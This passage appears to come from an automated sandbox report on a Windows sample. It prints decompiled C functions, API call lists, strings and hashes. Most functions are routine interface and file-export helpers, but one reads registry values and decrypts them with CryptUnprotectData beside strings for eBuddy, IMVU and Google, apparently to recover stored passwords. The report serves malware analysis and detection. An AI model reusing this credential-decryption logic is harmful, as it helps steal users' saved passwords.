                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                • API String ID: 4036804644-4125592482
                                • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FD2E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75D6F420,00000000), ref: 0040FD62
                                • RegCloseKey.ADVAPI32(?,?,75D6F420,00000000), ref: 0040FE4D
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 0040FDD4
                                • LocalFree.KERNEL32(?,?,00000000,?,?,75D6F420,00000000), ref: 0040FDE6
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75D6F420,00000000), ref: 0040FE2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                • String ID:
                                • API String ID: 2372935584-3916222277
                                • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
                                • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408D47, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E00408D47(struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t25;
				char* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				int _t43;
				signed int _t45;
				signed int _t46;

				_t46 = _t45 & 0xfffffff8;
				0x414060();
				_t25 = GetMenuItemCount(_a8);
				_t43 = 0;
				_v0 = _t25;
				if(_t25 <= 0) {
					L13:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t46 = _t46 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t25 = GetMenuItemInfoA(_a8, _t43, 1,  &_a4);
					if(_t25 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t25 = E00408D47();
							_t46 = _t46 + 0xc;
						}
						goto L12;
					}
					_t31 = strchr( &_a52, 9);
					if(_t31 != 0) {
						 *_t31 = 0;
					}
					_t32 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x41e1fc =  *0x41e1fc + 1;
							_t33 =  *0x41e1fc; // 0x0
							_t32 = _t33 + 0x11558;
						} else {
							_t18 = _t43 + 0x11171; // 0x11171
							_t32 = _t18;
						}
					}
					_t25 = E00408D0F(_t32,  &_a52);
					goto L10;
					L12:
					_t43 = _t43 + 1;
				} while (_t43 < _v0);
				goto L13;
			}











                                0x00408d4a
                                0x00408d52
                                0x00408d5c
                                0x00408d64
                                0x00408d68
                                0x00408d6c
                                0x00408e31
                                0x00408e36
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00408d72
                                0x00408d72
                                0x00408d7d
                                0x00408d82
                                0x00408d89
                                0x00408d98
                                0x00408da0
                                0x00408da8
                                0x00408db0
                                0x00408db4
                                0x00408db8
                                0x00408dc0
                                0x00000000
                                0x00000000
                                0x00408dc6
                                0x00408e10
                                0x00408e14
                                0x00408e16
                                0x00408e17
                                0x00408e1b
                                0x00408e1e
                                0x00408e23
                                0x00408e23
                                0x00000000
                                0x00408e14
                                0x00408dcf
                                0x00408dd8
                                0x00408dda
                                0x00408dda
                                0x00408de0
                                0x00408de4
                                0x00408de9
                                0x00408df3
                                0x00408df9
                                0x00408dfe
                                0x00408deb
                                0x00408deb
                                0x00408deb
                                0x00408deb
                                0x00408de9
                                0x00408e09
                                0x00000000
                                0x00408e26
                                0x00408e26
                                0x00408e27
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetstrchr
                                • String ID: 0$6
                                • API String ID: 2300387033-3849865405
                                • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
                                • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407034, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 90%
                                			E00407034(char* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v1035;
				void _v1036;
				int _t28;
				int _t34;
				char* _t39;
				int _t42;
				void* _t43;
				void** _t45;
				void* _t46;
				void* _t47;

				_t42 = 0;
				_v1036 = 0;
				memset( &_v1035, 0, 0x3ff);
				_t47 = _t46 + 0xc;
				 *__ebx = 0;
				_t45 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t45);
					_push( *((intOrPtr*)(_t45 - 4)));
					sprintf( &_v1036, "%s (%s)");
					_t28 = strlen( &_v1036);
					_v8 = _t28;
					memcpy(_t42 + __ebx,  &_v1036, _t28 + 1);
					_t43 = _t42 + _v8 + 1;
					_t34 = strlen( *_t45);
					_v8 = _t34;
					memcpy(_t43 + __ebx,  *_t45, _t34 + 1);
					_t47 = _t47 + 0x30;
					_t45 =  &(_t45[2]);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
					_t42 = _t43 + _v8 + 1;
				} while ( *_t17 != 0);
				_t39 = _t42 + __ebx;
				 *_t39 = 0;
				 *((char*)(_t39 + 1)) = 0;
				return __ebx;
			}















                                0x00407044
                                0x0040704e
                                0x00407055
                                0x0040705d
                                0x00407060
                                0x00407063
                                0x00407066
                                0x0040706d
                                0x0040706d
                                0x00407075
                                0x0040707e
                                0x0040708a
                                0x0040708f
                                0x0040709f
                                0x004070a9
                                0x004070ad
                                0x004070b2
                                0x004070bd
                                0x004070c5
                                0x004070c8
                                0x004070cb
                                0x004070cb
                                0x004070ce
                                0x004070ce
                                0x004070d4
                                0x004070d8
                                0x004070db
                                0x004070e3

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpystrlen$memsetsprintf
                                • String ID: %s (%s)
                                • API String ID: 3756086014-1363028141
                                • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406DCD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscat$memsetsprintf
                                • String ID: %2.2X
                                • API String ID: 125969286-791839006
                                • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
                                • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040496D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$_mbscat
                                • String ID: eK@$memcpy$msvcrt.dll
                                • API String ID: 2404237207-527332992
                                • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
                                • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408B7A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                Download Yara Rule
                                C-Code - Quality: 66%
                                			E00408B7A(struct HWND__* _a4) {
				void _v4103;
				char _v4104;

				0x414060();
				if( *0x41e200 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					_push( *0x41e348);
					sprintf(0x41e308, "dialog_%d");
					if(E00408C31(?str?,  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00408B1D, 0);
				}
				return 0x1004;
			}





                                0x00408b82
                                0x00408b8e
                                0x00408b9e
                                0x00408ba5
                                0x00408baa
                                0x00408bba
                                0x00408bd5
                                0x00408be1
                                0x00408be1
                                0x00000000
                                0x00408bf1
                                0x00408bf8

                                APIs
                                • memset.MSVCRT ref: 00408BA5
                                • sprintf.MSVCRT ref: 00408BBA
                                  • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
                                  • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                  • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
                                • SetWindowTextA.USER32(?,?), ref: 00408BE1
                                • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                • String ID: caption$dialog_%d
                                • API String ID: 2923679083-4161923789
                                • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
                                • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040807D, Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 67%
                                			E0040807D(char* __ebx, void* __eflags, void _a4, void _a8, intOrPtr _a12, short _a16) {
				void _v8;
				void _v12;
				char _v28;
				char _v116;
				char _v244;
				char _v248;
				char _v372;
				void _v627;
				char _v628;
				void* __edi;
				void* __esi;
				void* _t44;
				intOrPtr* _t50;
				int _t57;
				char* _t66;
				signed int _t69;
				intOrPtr _t75;
				int _t76;
				void* _t82;
				void* _t83;

				_t66 = __ebx;
				_t76 = 0;
				memcpy( &_v12,  &_a8, 4);
				memcpy( &_v8,  &_a4, 4);
				E0040C905( &_v116);
				_push( &_v12);
				_t44 = 8;
				E0040C929(_t44,  &_v116);
				E0040C9C7(0,  &_v116,  &_v28);
				E00405235( &_v372);
				_t69 = 0;
				_t50 =  &_v248;
				do {
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xf0)) =  *((intOrPtr*)(_t50 - 4));
					_t75 =  *_t50;
					 *((intOrPtr*)(_t83 + _t69 * 4 - 0xec)) = _t75;
					_t69 = _t69 + 2;
					_t50 = _t50 - 8;
				} while (_t69 < 0x20);
				if(_a16 >= 8) {
					_v628 = 0;
					memset( &_v627, 0, 0xfe);
					_t81 = _a12;
					E00405641(_a12, _t69, __ebx,  &_v244);
					if(_a16 < 0x10) {
						__ebx[8] = 0;
					} else {
						E00405641(_t81 + 8,  &_v244,  &(__ebx[8]),  &_v244);
						__ebx[0x10] = 0;
					}
					_t57 = strlen(_t66);
					if(_t57 > 2) {
						asm("cdq");
						_t82 = (_t57 - _t75 >> 1) - 1 + _t66;
						0x413d0c( &_v628, _t82 + 2);
						0x413d0c(_t82,  &_v628);
					}
					_t76 = 1;
				}
				return _t76;
			}























                                0x0040807d
                                0x00408092
                                0x00408094
                                0x004080a3
                                0x004080ab
                                0x004080b3
                                0x004080b6
                                0x004080ba
                                0x004080c6
                                0x004080d7
                                0x004080dc
                                0x004080de
                                0x004080e4
                                0x004080e7
                                0x004080ee
                                0x004080f0
                                0x004080f8
                                0x004080f9
                                0x004080fc
                                0x00408106
                                0x00408119
                                0x00408120
                                0x00408125
                                0x00408133
                                0x00408140
                                0x0040815b
                                0x00408142
                                0x0040814f
                                0x00408155
                                0x00408155
                                0x00408160
                                0x00408169
                                0x0040816b
                                0x00408171
                                0x0040817f
                                0x0040818c
                                0x00408191
                                0x00408196
                                0x00408196
                                0x0040819c

                                APIs
                                • memcpy.MSVCRT ref: 00408094
                                • memcpy.MSVCRT ref: 004080A3
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memset.MSVCRT ref: 00408120
                                • strlen.MSVCRT ref: 00408160
                                • _mbscpy.MSVCRT ref: 0040817F
                                • _mbscpy.MSVCRT ref: 0040818C
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset$_mbscpy$strlen
                                • String ID:
                                • API String ID: 2712745786-0
                                • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B8FA, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040B8FA(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				void* _t39;
				signed short _t52;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_v72 = E0040876F(0x1f5);
				_v68 = 0x418600;
				_v64 = E0040876F(0x1f6);
				_v60 = 0x418600;
				_v56 = E0040876F(0x1f7);
				_v52 = 0x418600;
				_v48 = E0040876F(0x1f8);
				_v44 = 0x418608;
				_v40 = E0040876F(0x1f9);
				_v36 = 0x418608;
				_v32 = E0040876F(0x1fa);
				_v28 = 0x418618;
				_v24 = E0040876F(0x1fb);
				_v20 = 0x418620;
				_v16 = E0040876F(0x1fc);
				_v12 = 0x418620;
				E00407034( &_v1096,  &_v72);
				_t52 = 7;
				_t39 = E0040876F(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406E60(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}

























                                0x0040b913
                                0x0040b91a
                                0x0040b927
                                0x0040b939
                                0x0040b93c
                                0x0040b949
                                0x0040b94c
                                0x0040b955
                                0x0040b958
                                0x0040b96a
                                0x0040b96d
                                0x0040b976
                                0x0040b979
                                0x0040b986
                                0x0040b989
                                0x0040b99b
                                0x0040b99e
                                0x0040b9a6
                                0x0040b9b3
                                0x0040b9b6
                                0x0040b9be
                                0x0040b9bf
                                0x0040b9c7
                                0x0040b9e7

                                APIs
                                • memset.MSVCRT ref: 0040B91A
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                  • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                  • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                  • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                  • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
                                  • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                  • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
                                  • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2726666094-3614832568
                                • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406CAA, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E00406CAA(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                0x00406caa
                                0x00406cc1
                                0x00406cc6
                                0x00406cd2
                                0x00406cd5
                                0x00406ce2
                                0x00406cfa
                                0x00406d0e
                                0x00406d2a

                                APIs
                                • GetDC.USER32(00000000), ref: 00406CB5
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
                                • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
                                • GetWindowRect.USER32(?,?), ref: 00406CE2
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,77413BB0), ref: 00406D20
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CapsDeviceWindow$MoveRectRelease
                                • String ID:
                                • API String ID: 3197862061-0
                                • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
                                • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403D24, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E00403D24(void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				0x414060();
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                0x00403d2c
                                0x00403d42
                                0x00403d49
                                0x00403d5c
                                0x00403d62
                                0x00403d79
                                0x00403d98
                                0x00403dc4

                                APIs
                                • memset.MSVCRT ref: 00403D49
                                • memset.MSVCRT ref: 00403D62
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
                                • strlen.MSVCRT ref: 00403DAA
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                • String ID:
                                • API String ID: 1786725549-0
                                • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
                                • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F37A, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • _strcmpi.MSVCRT ref: 0040F3D1
                                • _strcmpi.MSVCRT ref: 0040F3F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi$memcpystrlen
                                • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
                                • API String ID: 2025310588-2353251349
                                • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
                                • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BA30, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040BA30(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, 0x418628, 0,  &_v264);
				_t18 = E0040B9EA(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E004068B5(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00406830(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                0x0040ba30
                                0x0040ba3b
                                0x0040ba4a
                                0x0040ba50
                                0x0040ba52
                                0x0040ba5c
                                0x0040ba5c
                                0x0040ba77
                                0x0040ba7e
                                0x0040ba8f
                                0x0040ba96
                                0x0040ba9e
                                0x0040baa4
                                0x0040baa6
                                0x0040bab7
                                0x0040baa8
                                0x0040baaf
                                0x0040bab4
                                0x0040babf
                                0x0040bac7
                                0x0040bacc
                                0x00000000
                                0x0040bad4
                                0x0040badd

                                APIs
                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
                                • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
                                • OpenClipboard.USER32(?), ref: 0040BA9E
                                • GetLastError.KERNEL32 ref: 0040BAB7
                                • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                • String ID:
                                • API String ID: 2014771361-0
                                • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
                                • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412E4D, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
